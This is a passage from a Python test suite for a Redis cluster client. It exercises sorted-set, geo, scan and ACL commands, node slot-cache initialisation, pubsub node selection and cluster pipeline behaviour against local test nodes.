assert r.bzpopmin(["{foo}b", "{foo}a"], timeout=1) == (b"{foo}a", b"a1", 1)
assert r.bzpopmin(["{foo}b", "{foo}a"], timeout=1) == (b"{foo}a", b"a2", 2)
assert r.bzpopmin(["{foo}b", "{foo}a"], timeout=1) is None
r.zadd("{foo}c", {"c1": 100})
assert r.bzpopmin("{foo}c", timeout=1) == (b"{foo}c", b"c1", 100)
@skip_if_server_version_lt("6.2.0")
def test_cluster_zrangestore(self, r):
r.zadd("{foo}a", {"a1": 1, "a2": 2, "a3": 3})
assert r.zrangestore("{foo}b", "{foo}a", 0, 1)
assert r.zrange("{foo}b", 0, -1) == [b"a1", b"a2"]
assert r.zrangestore("{foo}b", "{foo}a", 1, 2)
assert r.zrange("{foo}b", 0, -1) == [b"a2", b"a3"]
assert r.zrange("{foo}b", 0, -1, withscores=True) == [(b"a2", 2), (b"a3", 3)]
# reversed order
assert r.zrangestore("{foo}b", "{foo}a", 1, 2, desc=True)
assert r.zrange("{foo}b", 0, -1) == [b"a1", b"a2"]
# by score
assert r.zrangestore(
"{foo}b", "{foo}a", 2, 1, byscore=True, offset=0, num=1, desc=True
)
assert r.zrange("{foo}b", 0, -1) == [b"a2"]
# by lex
assert r.zrangestore(
"{foo}b", "{foo}a", "[a2", "(a3", bylex=True, offset=0, num=1
)
assert r.zrange("{foo}b", 0, -1) == [b"a2"]
@skip_if_server_version_lt("6.2.0")
def test_cluster_zunion(self, r):
r.zadd("{foo}a", {"a1": 1, "a2": 1, "a3": 1})
r.zadd("{foo}b", {"a1": 2, "a2": 2, "a3": 2})
r.zadd("{foo}c", {"a1": 6, "a3": 5, "a4": 4})
# sum
assert r.zunion(["{foo}a", "{foo}b", "{foo}c"]) == [b"a2", b"a4", b"a3", b"a1"]
assert r.zunion(["{foo}a", "{foo}b", "{foo}c"], withscores=True) == [
(b"a2", 3),
(b"a4", 4),
(b"a3", 8),
(b"a1", 9),
]
# max
assert r.zunion(
["{foo}a", "{foo}b", "{foo}c"], aggregate="MAX", withscores=True
) == [(b"a2", 2), (b"a4", 4), (b"a3", 5), (b"a1", 6)]
# min
assert r.zunion(
["{foo}a", "{foo}b", "{foo}c"], aggregate="MIN", withscores=True
) == [(b"a1", 1), (b"a2", 1), (b"a3", 1), (b"a4", 4)]
# with weight
assert r.zunion({"{foo}a": 1, "{foo}b": 2, "{foo}c": 3}, withscores=True) == [
(b"a2", 5),
(b"a4", 12),
(b"a3", 20),
(b"a1", 23),
]
def test_cluster_zunionstore_sum(self, r):
r.zadd("{foo}a", {"a1": 1, "a2": 1, "a3": 1})
r.zadd("{foo}b", {"a1": 2, "a2": 2, "a3": 2})
r.zadd("{foo}c", {"a1": 6, "a3": 5, "a4": 4})
assert r.zunionstore("{foo}d", ["{foo}a", "{foo}b", "{foo}c"]) == 4
assert r.zrange("{foo}d", 0, -1, withscores=True) == [
(b"a2", 3),
(b"a4", 4),
(b"a3", 8),
(b"a1", 9),
]
def test_cluster_zunionstore_max(self, r):
r.zadd("{foo}a", {"a1": 1, "a2": 1, "a3": 1})
r.zadd("{foo}b", {"a1": 2, "a2": 2, "a3": 2})
r.zadd("{foo}c", {"a1": 6, "a3": 5, "a4": 4})
assert (
r.zunionstore("{foo}d", ["{foo}a", "{foo}b", "{foo}c"], aggregate="MAX")
== 4
)
assert r.zrange("{foo}d", 0, -1, withscores=True) == [
(b"a2", 2),
(b"a4", 4),
(b"a3", 5),
(b"a1", 6),
]
def test_cluster_zunionstore_min(self, r):
r.zadd("{foo}a", {"a1": 1, "a2": 2, "a3": 3})
r.zadd("{foo}b", {"a1": 2, "a2": 2, "a3": 4})
r.zadd("{foo}c", {"a1": 6, "a3": 5, "a4": 4})
assert (
r.zunionstore("{foo}d", ["{foo}a", "{foo}b", "{foo}c"], aggregate="MIN")
== 4
)
assert r.zrange("{foo}d", 0, -1, withscores=True) == [
(b"a1", 1),
(b"a2", 2),
(b"a3", 3),
(b"a4", 4),
]
def test_cluster_zunionstore_with_weight(self, r):
r.zadd("{foo}a", {"a1": 1, "a2": 1, "a3": 1})
r.zadd("{foo}b", {"a1": 2, "a2": 2, "a3": 2})
r.zadd("{foo}c", {"a1": 6, "a3": 5, "a4": 4})
assert r.zunionstore("{foo}d", {"{foo}a": 1, "{foo}b": 2, "{foo}c": 3}) == 4
assert r.zrange("{foo}d", 0, -1, withscores=True) == [
(b"a2", 5),
(b"a4", 12),
(b"a3", 20),
(b"a1", 23),
]
@skip_if_server_version_lt("2.8.9")
def test_cluster_pfcount(self, r):
members = {b"1", b"2", b"3"}
r.pfadd("{foo}a", *members)
assert r.pfcount("{foo}a") == len(members)
members_b = {b"2", b"3", b"4"}
r.pfadd("{foo}b", *members_b)
assert r.pfcount("{foo}b") == len(members_b)
assert r.pfcount("{foo}a", "{foo}b") == len(members_b.union(members))
@skip_if_server_version_lt("2.8.9")
def test_cluster_pfmerge(self, r):
mema = {b"1", b"2", b"3"}
memb = {b"2", b"3", b"4"}
memc = {b"5", b"6", b"7"}
r.pfadd("{foo}a", *mema)
r.pfadd("{foo}b", *memb)
r.pfadd("{foo}c", *memc)
r.pfmerge("{foo}d", "{foo}c", "{foo}a")
assert r.pfcount("{foo}d") == 6
r.pfmerge("{foo}d", "{foo}b")
assert r.pfcount("{foo}d") == 7
def test_cluster_sort_store(self, r):
r.rpush("{foo}a", "2", "3", "1")
assert r.sort("{foo}a", store="{foo}sorted_values") == 3
assert r.lrange("{foo}sorted_values", 0, -1) == [b"1", b"2", b"3"]
# GEO COMMANDS
@skip_if_server_version_lt("6.2.0")
def test_cluster_geosearchstore(self, r):
values = (2.1909389952632, 41.433791470673, "place1") + (
2.1873744593677,
41.406342043777,
"place2",
)
r.geoadd("{foo}barcelona", values)
r.geosearchstore(
"{foo}places_barcelona",
"{foo}barcelona",
longitude=2.191,
latitude=41.433,
radius=1000,
)
assert r.zrange("{foo}places_barcelona", 0, -1) == [b"place1"]
@skip_unless_arch_bits(64)
@skip_if_server_version_lt("6.2.0")
def test_geosearchstore_dist(self, r):
values = (2.1909389952632, 41.433791470673, "place1") + (
2.1873744593677,
41.406342043777,
"place2",
)
r.geoadd("{foo}barcelona", values)
r.geosearchstore(
"{foo}places_barcelona",
"{foo}barcelona",
longitude=2.191,
latitude=41.433,
radius=1000,
storedist=True,
)
        # instead of saving the geo score, the distance is saved.
assert r.zscore("{foo}places_barcelona", "place1") == 88.05060698409301
@skip_if_server_version_lt("3.2.0")
def test_cluster_georadius_store(self, r):
values = (2.1909389952632, 41.433791470673, "place1") + (
2.1873744593677,
41.406342043777,
"place2",
)
r.geoadd("{foo}barcelona", values)
r.georadius(
"{foo}barcelona", 2.191, 41.433, 1000, store="{foo}places_barcelona"
)
assert r.zrange("{foo}places_barcelona", 0, -1) == [b"place1"]
@skip_unless_arch_bits(64)
@skip_if_server_version_lt("3.2.0")
def test_cluster_georadius_store_dist(self, r):
values = (2.1909389952632, 41.433791470673, "place1") + (
2.1873744593677,
41.406342043777,
"place2",
)
r.geoadd("{foo}barcelona", values)
r.georadius(
"{foo}barcelona", 2.191, 41.433, 1000, store_dist="{foo}places_barcelona"
)
        # instead of saving the geo score, the distance is saved.
assert r.zscore("{foo}places_barcelona", "place1") == 88.05060698409301
def test_cluster_dbsize(self, r):
d = {"a": b"1", "b": b"2", "c": b"3", "d": b"4"}
assert r.mset_nonatomic(d)
assert r.dbsize(target_nodes="primaries") == len(d)
def test_cluster_keys(self, r):
assert r.keys() == []
keys_with_underscores = {b"test_a", b"test_b"}
keys = keys_with_underscores.union({b"testc"})
for key in keys:
r[key] = 1
assert (
set(r.keys(pattern="test_*", target_nodes="primaries"))
== keys_with_underscores
)
assert set(r.keys(pattern="test*", target_nodes="primaries")) == keys
# SCAN COMMANDS
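    # In cluster mode, SCAN fans out to the targeted nodes and returns a dict
    # of per-node cursors alongside the merged key list.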
@skip_if_server_version_lt("2.8.0")
def test_cluster_scan(self, r):
r.set("a", 1)
r.set("b", 2)
r.set("c", 3)
for target_nodes, nodes in zip(
["primaries", "replicas"], [r.get_primaries(), r.get_replicas()]
):
cursors, keys = r.scan(target_nodes=target_nodes)
assert sorted(keys) == [b"a", b"b", b"c"]
assert sorted(cursors.keys()) == sorted(node.name for node in nodes)
assert all(cursor == 0 for cursor in cursors.values())
cursors, keys = r.scan(match="a*", target_nodes=target_nodes)
assert sorted(keys) == [b"a"]
assert sorted(cursors.keys()) == sorted(node.name for node in nodes)
assert all(cursor == 0 for cursor in cursors.values())
@skip_if_server_version_lt("6.0.0")
def test_cluster_scan_type(self, r):
r.sadd("a-set", 1)
r.sadd("b-set", 1)
r.sadd("c-set", 1)
r.hset("a-hash", "foo", 2)
r.lpush("a-list", "aux", 3)
for target_nodes, nodes in zip(
["primaries", "replicas"], [r.get_primaries(), r.get_replicas()]
):
cursors, keys = r.scan(_type="SET", target_nodes=target_nodes)
assert sorted(keys) == [b"a-set", b"b-set", b"c-set"]
assert sorted(cursors.keys()) == sorted(node.name for node in nodes)
assert all(cursor == 0 for cursor in cursors.values())
cursors, keys = r.scan(_type="SET", match="a*", target_nodes=target_nodes)
assert sorted(keys) == [b"a-set"]
assert sorted(cursors.keys()) == sorted(node.name for node in nodes)
assert all(cursor == 0 for cursor in cursors.values())
@skip_if_server_version_lt("2.8.0")
def test_cluster_scan_iter(self, r):
keys_all = []
keys_1 = []
for i in range(100):
s = str(i)
r.set(s, 1)
keys_all.append(s.encode("utf-8"))
if s.startswith("1"):
keys_1.append(s.encode("utf-8"))
keys_all.sort()
keys_1.sort()
for target_nodes in ["primaries", "replicas"]:
keys = r.scan_iter(target_nodes=target_nodes)
assert sorted(keys) == keys_all
keys = r.scan_iter(match="1*", target_nodes=target_nodes)
assert sorted(keys) == keys_1
def test_cluster_randomkey(self, r):
node = r.get_node_from_key("{foo}")
assert r.randomkey(target_nodes=node) is None
for key in ("{foo}a", "{foo}b", "{foo}c"):
r[key] = 1
assert r.randomkey(target_nodes=node) in (b"{foo}a", b"{foo}b", b"{foo}c")
@skip_if_server_version_lt("6.0.0")
@skip_if_redis_enterprise()
def test_acl_log(self, r, request):
key = "{cache}:"
node = r.get_node_from_key(key)
username = "redis-py-user"
def teardown():
r.acl_deluser(username, target_nodes="primaries")
request.addfinalizer(teardown)
r.acl_setuser(
username,
enabled=True,
reset=True,
commands=["+get", "+set", "+select", "+cluster", "+command", "+info"],
keys=["{cache}:*"],
nopass=True,
target_nodes="primaries",
)
r.acl_log_reset(target_nodes=node)
user_client = _get_client(
RedisCluster, request, flushdb=False, username=username
)
# Valid operation and key
assert user_client.set("{cache}:0", 1)
assert user_client.get("{cache}:0") == b"1"
# Invalid key
with pytest.raises(NoPermissionError):
user_client.get("{cache}violated_cache:0")
# Invalid operation
with pytest.raises(NoPermissionError):
user_client.hset("{cache}:0", "hkey", "hval")
assert isinstance(r.acl_log(target_nodes=node), list)
assert len(r.acl_log(target_nodes=node)) == 2
assert len(r.acl_log(count=1, target_nodes=node)) == 1
assert isinstance(r.acl_log(target_nodes=node)[0], dict)
assert "client-info" in r.acl_log(count=1, target_nodes=node)[0]
assert r.acl_log_reset(target_nodes=node)
@pytest.mark.onlycluster
class TestNodesManager:
"""
Tests for the NodesManager class
"""
def test_load_balancer(self, r):
n_manager = r.nodes_manager
lb = n_manager.read_load_balancer
slot_1 = 1257
slot_2 = 8975
node_1 = ClusterNode(default_host, 6379, PRIMARY)
node_2 = ClusterNode(default_host, 6378, REPLICA)
node_3 = ClusterNode(default_host, 6377, REPLICA)
node_4 = ClusterNode(default_host, 6376, PRIMARY)
node_5 = ClusterNode(default_host, 6375, REPLICA)
n_manager.slots_cache = {
slot_1: [node_1, node_2, node_3],
slot_2: [node_4, node_5],
}
primary1_name = n_manager.slots_cache[slot_1][0].name
primary2_name = n_manager.slots_cache[slot_2][0].name
list1_size = len(n_manager.slots_cache[slot_1])
list2_size = len(n_manager.slots_cache[slot_2])
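        # get_server_index round-robins 0..len-1 per primary name, so with
        # three nodes for slot_1 the expected sequence is 0, 1, 2, 0, ...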
# slot 1
assert lb.get_server_index(primary1_name, list1_size) == 0
assert lb.get_server_index(primary1_name, list1_size) == 1
assert lb.get_server_index(primary1_name, list1_size) == 2
assert lb.get_server_index(primary1_name, list1_size) == 0
# slot 2
assert lb.get_server_index(primary2_name, list2_size) == 0
assert lb.get_server_index(primary2_name, list2_size) == 1
assert lb.get_server_index(primary2_name, list2_size) == 0
lb.reset()
assert lb.get_server_index(primary1_name, list1_size) == 0
assert lb.get_server_index(primary2_name, list2_size) == 0
def test_init_slots_cache_not_all_slots_covered(self):
"""
Test that if not all slots are covered it should raise an exception
"""
# Missing slot 5460
cluster_slots = [
[0, 5459, ["127.0.0.1", 7000], ["127.0.0.1", 7003]],
[5461, 10922, ["127.0.0.1", 7001], ["127.0.0.1", 7004]],
[10923, 16383, ["127.0.0.1", 7002], ["127.0.0.1", 7005]],
]
with pytest.raises(RedisClusterException) as ex:
get_mocked_redis_client(
host=default_host,
port=default_port,
cluster_slots=cluster_slots,
require_full_coverage=True,
)
assert str(ex.value).startswith(
"All slots are not covered after query all startup_nodes."
)
def test_init_slots_cache_not_require_full_coverage_success(self):
"""
When require_full_coverage is set to False and not all slots are
covered, the cluster client initialization should succeed
"""
# Missing slot 5460
cluster_slots = [
[0, 5459, ["127.0.0.1", 7000], ["127.0.0.1", 7003]],
[5461, 10922, ["127.0.0.1", 7001], ["127.0.0.1", 7004]],
[10923, 16383, ["127.0.0.1", 7002], ["127.0.0.1", 7005]],
]
rc = get_mocked_redis_client(
host=default_host,
port=default_port,
cluster_slots=cluster_slots,
require_full_coverage=False,
)
assert 5460 not in rc.nodes_manager.slots_cache
def test_init_slots_cache(self):
"""
Test that the slots cache can be initialized and all slots are covered
"""
good_slots_resp = [
[0, 5460, ["127.0.0.1", 7000], ["127.0.0.2", 7003]],
[5461, 10922, ["127.0.0.1", 7001], ["127.0.0.2", 7004]],
[10923, 16383, ["127.0.0.1", 7002], ["127.0.0.2", 7005]],
]
rc = get_mocked_redis_client(
host=default_host, port=default_port, cluster_slots=good_slots_resp
)
n_manager = rc.nodes_manager
assert len(n_manager.slots_cache) == REDIS_CLUSTER_HASH_SLOTS
for slot_info in good_slots_resp:
all_hosts = ["127.0.0.1", "127.0.0.2"]
all_ports = [7000, 7001, 7002, 7003, 7004, 7005]
slot_start = slot_info[0]
slot_end = slot_info[1]
for i in range(slot_start, slot_end + 1):
assert len(n_manager.slots_cache[i]) == len(slot_info[2:])
assert n_manager.slots_cache[i][0].host in all_hosts
assert n_manager.slots_cache[i][1].host in all_hosts
assert n_manager.slots_cache[i][0].port in all_ports
assert n_manager.slots_cache[i][1].port in all_ports
assert len(n_manager.nodes_cache) == 6
def test_init_slots_cache_cluster_mode_disabled(self):
"""
Test that creating a RedisCluster fails if one of the startup nodes
has cluster mode disabled
"""
with pytest.raises(RedisClusterException) as e:
get_mocked_redis_client(
host=default_host, port=default_port, cluster_enabled=False
)
assert "Cluster mode is not enabled on this node" in str(e.value)
def test_empty_startup_nodes(self):
"""
It should not be possible to create a node manager with no nodes
specified
"""
with pytest.raises(RedisClusterException):
NodesManager([])
def test_wrong_startup_nodes_type(self):
"""
If something other than a list-type iterable is provided, it should
fail
"""
with pytest.raises(RedisClusterException):
NodesManager({})
def test_init_slots_cache_slots_collision(self, request):
"""
Test that if 2 nodes do not agree on the same slots setup it should
raise an error. In this test both nodes will say that the first
slots block should be bound to different servers.
"""
with patch.object(NodesManager, "create_redis_node") as create_redis_node:
def create_mocked_redis_node(host, port, **kwargs):
"""
Helper function to return custom slots cache data from
different redis nodes
"""
if port == 7000:
result = [
[
0,
5460,
["127.0.0.1", 7000],
["127.0.0.1", 7003],
],
[
5461,
10922,
["127.0.0.1", 7001],
["127.0.0.1", 7004],
],
]
elif port == 7001:
result = [
[
0,
5460,
["127.0.0.1", 7001],
["127.0.0.1", 7003],
],
[
5461,
10922,
["127.0.0.1", 7000],
["127.0.0.1", 7004],
],
]
else:
result = []
r_node = Redis(host=host, port=port)
orig_execute_command = r_node.execute_command
def execute_command(*args, **kwargs):
if args[0] == "CLUSTER SLOTS":
return result
elif args[0] == "INFO":
return {"cluster_enabled": True}
elif args[1] == "cluster-require-full-coverage":
return {"cluster-require-full-coverage": "yes"}
else:
return orig_execute_command(*args, **kwargs)
r_node.execute_command = execute_command
return r_node
create_redis_node.side_effect = create_mocked_redis_node
with pytest.raises(RedisClusterException) as ex:
node_1 = ClusterNode("127.0.0.1", 7000)
node_2 = ClusterNode("127.0.0.1", 7001)
RedisCluster(startup_nodes=[node_1, node_2])
assert str(ex.value).startswith(
"startup_nodes could not agree on a valid slots cache"
), str(ex.value)
def test_cluster_one_instance(self):
"""
If the cluster consists of only one node, there are some hacks that must
be validated to work.
"""
node = ClusterNode(default_host, default_port)
cluster_slots = [[0, 16383, ["", default_port]]]
rc = get_mocked_redis_client(startup_nodes=[node], cluster_slots=cluster_slots)
n = rc.nodes_manager
assert len(n.nodes_cache) == 1
n_node = rc.get_node(node_name=node.name)
assert n_node is not None
assert n_node == node
assert n_node.server_type == PRIMARY
assert len(n.slots_cache) == REDIS_CLUSTER_HASH_SLOTS
for i in range(0, REDIS_CLUSTER_HASH_SLOTS):
assert n.slots_cache[i] == [n_node]
def test_init_with_down_node(self):
"""
If I can't connect to one of the nodes, everything should still work.
But if I can't connect to any of the nodes, an exception should be thrown.
"""
with patch.object(NodesManager, "create_redis_node") as create_redis_node:
def create_mocked_redis_node(host, port, **kwargs):
if port == 7000:
raise ConnectionError("mock connection error for 7000")
r_node = Redis(host=host, port=port, decode_responses=True)
def execute_command(*args, **kwargs):
if args[0] == "CLUSTER SLOTS":
return [
[
0,
8191,
["127.0.0.1", 7001, "node_1"],
],
[
8192,
16383,
["127.0.0.1", 7002, "node_2"],
],
]
elif args[0] == "INFO":
return {"cluster_enabled": True}
elif args[1] == "cluster-require-full-coverage":
return {"cluster-require-full-coverage": "yes"}
r_node.execute_command = execute_command
return r_node
create_redis_node.side_effect = create_mocked_redis_node
node_1 = ClusterNode("127.0.0.1", 7000)
node_2 = ClusterNode("127.0.0.1", 7001)
# If all startup nodes fail to connect, connection error should be
# thrown
with pytest.raises(RedisClusterException) as e:
RedisCluster(startup_nodes=[node_1])
assert "Redis Cluster cannot be connected" in str(e.value)
with patch.object(
CommandsParser, "initialize", autospec=True
) as cmd_parser_initialize:
def cmd_init_mock(self, r):
self.commands = {
"get": {
"name": "get",
"arity": 2,
"flags": ["readonly", "fast"],
"first_key_pos": 1,
"last_key_pos": 1,
"step_count": 1,
}
}
cmd_parser_initialize.side_effect = cmd_init_mock
# When at least one startup node is reachable, the cluster
# initialization should succeed
rc = RedisCluster(startup_nodes=[node_1, node_2])
assert rc.get_node(host=default_host, port=7001) is not None
assert rc.get_node(host=default_host, port=7002) is not None
@pytest.mark.onlycluster
class TestClusterPubSubObject:
"""
Tests for the ClusterPubSub class
"""
def test_init_pubsub_with_host_and_port(self, r):
"""
Test creation of pubsub instance with passed host and port
"""
node = r.get_default_node()
p = r.pubsub(host=node.host, port=node.port)
assert p.get_pubsub_node() == node
def test_init_pubsub_with_node(self, r):
"""
Test creation of pubsub instance with passed node
"""
node = r.get_default_node()
p = r.pubsub(node=node)
assert p.get_pubsub_node() == node
def test_init_pubsub_without_specifying_node(self, r):
"""
Test creation of pubsub instance without specifying a node. The node
should be determined based on the keyslot of the first command
execution.
"""
channel_name = "foo"
node = r.get_node_from_key(channel_name)
p = r.pubsub()
assert p.get_pubsub_node() is None
p.subscribe(channel_name)
assert p.get_pubsub_node() == node
def test_init_pubsub_with_a_non_existent_node(self, r):
"""
Test creation of pubsub instance with a node that doesn't exist in the
cluster. RedisClusterException should be raised.
"""
node = ClusterNode("1.1.1.1", 1111)
with pytest.raises(RedisClusterException):
r.pubsub(node)
def test_init_pubsub_with_a_non_existent_host_port(self, r):
"""
Test creation of pubsub instance with host and port that don't belong
to a node in the cluster.
RedisClusterException should be raised.
"""
with pytest.raises(RedisClusterException):
r.pubsub(host="1.1.1.1", port=1111)
def test_init_pubsub_host_or_port(self, r):
"""
Test creation of pubsub instance with host but without port, and vice
versa. DataError should be raised.
"""
with pytest.raises(DataError):
r.pubsub(host="localhost")
with pytest.raises(DataError):
r.pubsub(port=16379)
def test_get_redis_connection(self, r):
"""
Test that get_redis_connection() returns the redis connection of the
set pubsub node
"""
node = r.get_default_node()
p = r.pubsub(node=node)
assert p.get_redis_connection() == node.redis_connection
@pytest.mark.onlycluster
class TestClusterPipeline:
"""
Tests for the ClusterPipeline class
"""
def test_blocked_methods(self, r):
"""
Currently some method calls on a cluster pipeline
are blocked when used in cluster mode.
They may be implemented in the future.
"""
pipe = r.pipeline()
with pytest.raises(RedisClusterException):
pipe.multi()
with pytest.raises(RedisClusterException):
pipe.immediate_execute_command()
with pytest.raises(RedisClusterException):
pipe._execute_transaction(None, None, None)
with pytest.raises(RedisClusterException):
pipe.load_scripts()
with pytest.raises(RedisClusterException):
pipe.watch()
with pytest.raises(RedisClusterException):
pipe.unwatch()
with pytest.raises(RedisClusterException):
pipe.script_load_for_pipeline(None)
with pytest.raises(RedisClusterException):
pipe.eval()
def test_blocked_arguments(self, r):
"""
Currently some arguments are blocked when used in cluster mode.
They may be implemented in the future.
"""
with pytest.raises(RedisClusterException) as ex:
r.pipeline(transaction=True)
assert (
str(ex.value).startswith("transaction is deprecated in cluster mode")
is True
)
with pytest.raises(RedisClusterException) as ex:
r.pipeline(shard_hint=True)
assert (
str(ex.value).startswith("shard_hint is deprecated in cluster mode") is True
)
def test_redis_cluster_pipeline(self, r):
"""
Test that we can use a pipeline with the RedisCluster class
"""
with r.pipeline() as pipe:
pipe.set("foo", "bar")
pipe.get("foo")
assert pipe.execute() == [True, b"bar"]
def test_mget_disabled(self, r):
"""
Test that mget is disabled for ClusterPipeline
"""
with r.pipeline() as pipe:
with pytest.raises(RedisClusterException):
pipe.mget(["a"])
def test_mset_disabled(self, r):
"""
Test that mset is disabled for ClusterPipeline
"""
with r.pipeline() as pipe:
with pytest.raises(RedisClusterException):
pipe.mset({"a": 1, "b": 2})
def test_rename_disabled(self, r):
"""
Test that rename is disabled for ClusterPipeline
"""
with r.pipeline(transaction=False) as pipe:
with pytest.raises(RedisClusterException):
pipe.rename("a", "b")
def test_renamenx_disabled(self, r):
"""
Test that renamenx is disabled for ClusterPipeline
"""
with r.pipeline(transaction=False) as pipe:
with pytest.raises(RedisClusterException):
pipe.renamenx("a", "b")
def test_delete_single(self, r):
"""
Test a single delete operation
"""
r["a"] = 1
with r.pipeline(transaction=False) as pipe:
pipe.delete("a")
assert pipe.execute() == [1]
def test_multi_delete_unsupported(self, r):
"""
Test that multi delete operation is unsupported
"""
with r.pipeline(transaction=False) as pipe:
r["a"] = 1
r["b"] = 2
with pytest.raises(RedisClusterException):
pipe.delete("a", "b")
def test_brpoplpush_disabled(self, r):
"""
Test that brpoplpush is disabled for ClusterPipeline
"""
with r.pipeline(transaction=False) as pipe:
with pytest.raises(RedisClusterException):
pipe.brpoplpush()
def test_rpoplpush_disabled(self, r):
"""
Test that rpoplpush is disabled for ClusterPipeline
"""
with r.pipeline(transaction=False) as pipe:
with pytest.raises(RedisClusterException):
pipe.rpoplpush()
def test_sort_disabled(self, r):
"""
Test that sort is disabled for ClusterPipeline
"""
with r.pipeline(transaction=False) as pipe:
with pytest.raises(RedisClusterException):
pipe.sort()
def test_sdiff_disabled(self, r):
"""
Test that sdiff is disabled for ClusterPipeline
"""
with r.pipeline(transaction=False) as pipe:
with pytest.raises(RedisClusterException):
pipe.sdiff()
def test_sdiffstore_disabled(self, r):
"""
Test that sdiffstore is disabled for ClusterPipeline
"""
with r.pipeline(transaction=False) as pipe:
with pytest.raises(RedisClusterException):
pipe.sdiffstore()
def test_sinter_disabled(self, r):
"""
Test that sinter is disabled for ClusterPipeline
"""
with r.pipeline(transaction=False) as pipe:
with pytest.raises(RedisClusterException):
pipe.sinter()
def test_sinterstore_disabled(self, r):
"""
Test that sinterstore is disabled for ClusterPipeline
"""
with r.pipeline(transaction=False) as pipe:
with pytest.raises(RedisClusterException):
pipe.sinterstore()
def test_smove_disabled(self, r):
"""
Test that smove is disabled for ClusterPipeline
"""
with r.pipeline(transaction=False) as pipe:
with pytest.raises(RedisClusterException):
pipe.smove()
def test_sunion_disabled(self, r):
"""
Test that sunion is disabled for ClusterPipeline
"""
with r.pipeline(transaction=False) as pipe:
with pytest.raises(RedisClusterException):
pipe.sunion()
def test_sunionstore_disabled(self, r):
"""
Test that sunionstore is disabled for ClusterPipeline
"""
with r.pipeline(transaction=False) as pipe:
with pytest.raises(RedisClusterException):
pipe.sunionstore()
def test_pfmerge_disabled(self, r):
"""
Test that pfmerge is disabled for ClusterPipeline
"""
with r.pipeline(transaction=False) as pipe:
with pytest.raises(RedisClusterException):
pipe.pfmerge()
def test_multi_key_operation_with_a_single_slot(self, r):
"""
Test multi key operation with a single slot
"""
pipe = r.pipeline(transaction=False)
pipe.set("a{foo}", 1)
pipe.set("b{foo}", 2)
pipe.set("c{foo}", 3)
pipe.get("a{foo}")
pipe.get("b{foo}")
pipe.get("c{foo}")
res = pipe.execute()
assert res == [True, True, True, b"1", b"2", b"3"]
def test_multi_key_operation_with_multi_slots(self, r):
"""
Test multi key operation with more than one slot
"""
pipe = r.pipeline(transaction=False)
pipe.set("a{foo}", 1)
pipe.set("b{foo}", 2)
pipe.set("c{foo}", 3)
pipe.set("bar", 4)
pipe.set("bazz", 5)
pipe.get("a{foo}")
pipe.get("b{foo}")
pipe.get("c{foo}")
pipe.get("bar")
pipe.get("bazz")
res = pipe.execute()
assert res == [True, True, True, True, True, b"1", b"2", b"3", b"4", b"5"]
def test_connection_error_not_raised(self, r):
"""
Test that the pipeline doesn't raise an error on connection error when
raise_on_error=False
"""
key = "foo"
node = r.get_node_from_key(key, False)
def raise_connection_error():
e = ConnectionError("error")
return e
with r.pipeline() as pipe:
mock_node_resp_func(node, raise_connection_error)
res = pipe.get(key).get(key).execute(raise_on_error=False)
assert node.redis_connection.connection.read_response.called
assert isinstance(res[0], ConnectionError)
def test_connection_error_raised(self, r):
"""
Test that the pipeline raises an error on connection error when
raise_on_error=True
"""
key = "foo"
node = r.get_node_from_key(key, False)
def raise_connection_error():
e = ConnectionError("error")
return e
with r.pipeline() as pipe:
mock_node_resp_func(node, raise_connection_error)
with pytest.raises(ConnectionError):
pipe.get(key).get(key).execute(raise_on_error=True)
def test_asking_error(self, r):
"""
Test redirection on ASK error
"""
key = "foo"
first_node = r.get_node_from_key(key, False)
ask_node = None
for node in r.get_nodes():
if node != first_node:
ask_node = node
break
if ask_node is None:
warnings.warn("skipping this test since the cluster has only one " "node")
return
ask_msg = f"{r.keyslot(key)} {ask_node.host}:{ask_node.port}"
def raise_ask_error():
raise AskError(ask_msg)
with r.pipeline() as pipe:
mock_node_resp_func(first_node, raise_ask_error)
mock_node_resp(ask_node, "MOCK_OK")
res = pipe.get(key).execute()
assert first_node.redis_connection.connection.read_response.called
assert ask_node.redis_connection.connection.read_response.called
assert res == ["MOCK_OK"]
def test_empty_stack(self, r):
"""
If the pipeline is executed with no commands it should
return an empty list.
"""
p = r.pipeline()
result = p.execute()
assert result == []
@pytest.mark.onlycluster
class TestReadOnlyPipeline:
"""
Tests for ClusterPipeline class in readonly mode
"""
def test_pipeline_readonly(self, r):
"""
In readonly mode, we support read-related commands only.
"""
r.readonly(target_nodes="all")
r.set("foo71", "a1") # we assume this key is set on 127.0.0.1:7001
r.zadd("foo88", {"z1": 1}) # we assume this key is set on 127.0.0.1:7002
r.zadd("foo88", {"z2": 4})
with r.pipeline() as readonly_pipe:
readonly_pipe.get("foo71").zrange("foo88", 0, 5, withscores=True)
assert readonly_pipe.execute() == [
b"a1",
[(b"z1", 1.0), (b"z2", 4)],
]
def test_moved_redirection_on_slave_with_default(self, r):
"""
On a pipeline, we are redirected once and finally read from the primary
with a readonly client when the data has completely moved.
"""
key = "bar"
r.set(key, "foo")
# set read_from_replicas to True
r.read_from_replicas = True
primary = r.get_node_from_key(key, False)
replica = r.get_node_from_key(key, True)
with r.pipeline() as readwrite_pipe:
mock_node_resp(primary, "MOCK_FOO")
if replica is not None:
moved_error = f"{r.keyslot(key)} {primary.host}:{primary.port}"
def raise_moved_error():
raise MovedError(moved_error)
mock_node_resp_func(replica, raise_moved_error)
assert readwrite_pipe.reinitialize_counter == 0
readwrite_pipe.get(key).get(key)
assert readwrite_pipe.execute() == ["MOCK_FOO", "MOCK_FOO"]
if replica is not None:
# the slot has a replica as well, so MovedError should have
# occurred. If MovedError occurs, we should see the
# reinitialize_counter increase.
assert readwrite_pipe.reinitialize_counter == 1
conn = replica.redis_connection.connection
assert conn.read_response.called is True
def test_readonly_pipeline_from_readonly_client(self, request):
"""
Test that the pipeline is initialized with readonly mode if the client
has it enabled
"""
# Create a cluster client that reads from replicas
ro = _get_client(RedisCluster, request, read_from_replicas=True)
key = "bar"
ro.set(key, "foo")
import time
time.sleep(0.2)
with ro.pipeline() as readonly_pipe:
mock_all_nodes_resp(ro, "MOCK_OK")
assert readonly_pipe.read_from_replicas is True
assert readonly_pipe.get(key).get(key).execute() == ["MOCK_OK", "MOCK_OK"]
slot_nodes = ro.nodes_manager.slots_cache[ro.keyslot(key)]
if len(slot_nodes) > 1:
executed_on_replica = False
for node in slot_nodes:
if node.server_type == REPLICA:
conn = node.redis_connection.connection
executed_on_replica = conn.read_response.called
if executed_on_replica:
break
assert executed_on_replica is True
@pytest.mark.onlycluster
class TestClusterMonitor:
def test_wait_command_not_found(self, r):
"Make sure the wait_for_command func works when command is not found"
key = "foo"
node = r.get_node_from_key(key)
with r.monitor(target_node=node) as m:
